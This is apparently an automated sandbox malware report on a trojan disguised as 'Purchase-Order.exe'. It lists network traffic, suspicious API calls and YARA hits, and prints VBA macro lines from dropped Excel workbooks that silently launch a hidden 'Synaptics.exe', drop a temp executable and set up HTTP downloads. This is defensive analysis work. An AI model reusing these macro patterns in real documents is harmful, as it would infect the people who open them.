                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49930 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49932 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49936 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49938 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49939 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49943 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49945 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49949 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49948 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49953 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49954 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49957 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49958 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49975 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49974 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49981 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49988 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49989 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50000 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50001 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50004 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50022 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50023 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50054 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50055 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50079 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50081 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50111 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50112 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50123 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50122 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50147 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50146 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50156 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50157 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50189 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50192 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50198 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50199 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50214 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50215 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50225 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50223 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50234 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50235 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50250 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50251 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50260 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50261 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50276 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50273 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50287 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50288 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50310 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50311 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50331 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50332 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50345 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50346 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50377 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50376 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50379 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50378 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50411 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50412 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50435 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50437 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50439 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50440 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50445 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50446 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50451 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50452 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50454 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50455 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50458 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50459 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50464 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50467 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50470 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50471 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50486 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50489 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50495 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50496 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50501 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50502 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50506 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50505 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50508 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50507 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50520 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50521 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50529 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50530 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50534 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50536 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50538 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50539 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50548 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50547 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50552 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50551 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50559 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50560 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50565 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50569 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50570 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50571 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50574 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50575 version: TLS 1.2
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D97099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_00D97099
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D97294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_00D97294
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D97099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_00D97099
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D84342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,8_2_00D84342
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00DAF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_00DAF5D0

                                System Summary

                                barindex
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: PNFX2U4z.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: DVWHKMNFNN.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: PNFX2U4z.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: DVWHKMNFNN.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: PNFX2U4z.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: DVWHKMNFNN.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: initial sampleStatic PE information: Filename: Purchase-Order.exe
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D870AE: CreateFileW,DeviceIoControl,CloseHandle,8_2_00D870AE
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D7B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_00D7B9F1
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D882D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_00D882D0
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D4DCD08_2_00D4DCD0
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D4A0C08_2_00D4A0C0
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D601838_2_00D60183
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8220C8_2_00D8220C
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D485308_2_00D48530
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D606778_2_00D60677
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D466708_2_00D46670
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D787798_2_00D78779
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00DAA8DC8_2_00DAA8DC
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D60A8F8_2_00D60A8F
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D46BBC8_2_00D46BBC
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D6AC838_2_00D6AC83
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D48CA08_2_00D48CA0
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D5AD5C8_2_00D5AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D60EC48_2_00D60EC4
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D74EBF8_2_00D74EBF
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00DA30AD8_2_00DA30AD
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D7113E8_2_00D7113E
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D612F98_2_00D612F9
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D7542F8_2_00D7542F
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00DAF5D08_2_00DAF5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D536808_2_00D53680
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D7599F8_2_00D7599F
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D6DA748_2_00D6DA74
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D6BDF68_2_00D6BDF6
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D4BDF08_2_00D4BDF0
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D45D328_2_00D45D32
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D61E5A8_2_00D61E5A
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D77FFD8_2_00D77FFD
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8BFB88_2_00D8BFB8
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D6DF698_2_00D6DF69
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: PNFX2U4z.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: DVWHKMNFNN.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX600B.tmp 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: String function: 00D67750 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: String function: 00D5F885 appears 67 times
                                Source: Purchase-Order.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                Source: Purchase-Order.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCX600B.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Purchase-Order.exe, 00000000.00000003.1705016698.00000000008D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Purchase-Order.exe
                                Source: Purchase-Order.exe, 00000000.00000003.1705016698.00000000008D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNamer vs Purchase-Order.exe
                                Source: Purchase-Order.exe, 00000000.00000003.1704969935.0000000002490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs Purchase-Order.exe
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Purchase-Order.exe
                                Source: Purchase-Order.exe, 00000000.00000002.1705899917.0000000000903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs Purchase-Order.exe
                                Source: Purchase-Order.exe, 00000000.00000003.1705016698.00000000008FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs Purchase-Order.exe
                                Source: Purchase-Order.exe, 00000000.00000000.1695510360.0000000000616000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs Purchase-Order.exe
                                Source: Purchase-Order.exe, 00000000.00000003.1702576403.00000000008AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Purchase-Order.exe
                                Source: Purchase-Order.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@22/158@23/4
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8D712 GetLastError,FormatMessageW,8_2_00D8D712
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D7B8B0 AdjustTokenPrivileges,CloseHandle,8_2_00D7B8B0
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D7BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,8_2_00D7BEC3
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,8_2_00D8EA85
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D86F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,8_2_00D86F5B
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D9C604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,8_2_00D9C604
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D431F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,8_2_00D431F2
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile created: C:\Users\user\Desktop\._cache_Purchase-Order.exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:772:120:WilError_03
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeFile created: C:\Users\user\AppData\Local\Temp\LMDNDG.vbsJump to behavior
                                Source: Yara matchFile source: Purchase-Order.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Purchase-Order.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX600B.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs
                                Source: C:\Users\user\Desktop\Purchase-Order.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
